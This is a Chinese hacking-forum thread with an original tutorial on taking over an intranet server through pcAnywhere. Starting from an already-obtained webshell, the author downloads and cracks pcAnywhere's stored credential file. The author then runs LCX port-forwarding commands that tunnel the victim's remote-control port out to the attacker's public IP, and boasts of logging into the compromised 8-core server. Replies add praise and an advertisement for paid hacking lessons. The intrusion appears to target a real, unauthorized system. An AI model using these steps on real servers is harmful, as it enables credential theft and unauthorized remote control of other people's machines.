返回列表 发帖

[原创文章] pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
% V- [* U+ q5 d' ~6 g4 ?$ [
$ k, W6 ~/ u* l5 Z" |提权方法:pcanywhere+LCX/ v8 q4 v4 X4 T3 o. o
+ Z; x9 K9 x5 y8 y! @2 }
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。- P; {: e- m" b" i1 ~; G& o. ~

1 h: K0 P9 @" P( E: J在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。& a7 y2 N' b; M9 G) ^/ x

  w; Y4 }# N5 u- z2 g2 f. W# l
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。7 G% a% t* I* d$ y
5 j% M2 i9 c% C# i: z' I, g
' _! D9 w' w" p% t7 E3 j
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
/ |8 s! n* y" e: c4 `$ \) ~; Q0 C; U" s. t1 V

. S0 }1 W: b% {- H5 @3 Y: q7 Y4 x4 _& P, }' t* M
: U# J3 |6 x9 t
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``7 |4 Y2 o+ N) w# u
$ Q8 v8 H: w+ p8 [' d

# z- T2 v0 y1 e2 m: A7 ]( J4 tLCX的用法再简单说下:# q/ E* d3 P6 x! D' A

4 b' T) A+ k1 T+ `5 V服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)3 y5 B+ z6 l! V9 m

) \) _( s5 a4 q; Y& R% T本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)* R' e8 ^  O, z8 v  L" U

. L( Z6 E0 g7 j0 \7 }. h# h由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。: X+ P% |: \; C4 H$ `) K; N) y* }5 J
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``( B( e4 s# R2 Z/ ^9 i% J

: \+ g& P/ x3 {1 ]0 x: G8 |" o9 W5 M& s( V
+ J. w" H" W; h; y! e8 j+ l* H

2 e5 {2 T$ P, O+ P6 {/ r呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。3 X* `. y4 P3 A% q# j) Y
* [$ N$ ^- t3 H- k

* Q/ F) k. Q' V1 |' b, H# D
' Y* ~& J/ g" J/ i% c7 E9 O+ N5 X9 m9 [  l. ^. e
我们本地连接试试,输入我们刚破解的账号密码
" t; s+ a+ x: D) A  L. [. a/ B8 j/ s# j1 C" `+ ]

& U8 `( Y! G/ s* c% }+ P# t呵呵``连接成功,服务器不错,又一个8核^︵^
, `/ j7 l) v& F
, T% |, _1 ~) f; ?( U. J
- e$ o) k! A  W4 x
0 ~% s  A7 d2 B3 Z
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
1

评分人数

  • 柔肠寸断

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.

TOP

顶起。。。。。。。。。
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

八核的哟

TOP

哎。。。。运气不佳```老碰见内网的。。。。

TOP

不错不错。。。你的貌似一直都是内网服务器哈
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

返回列表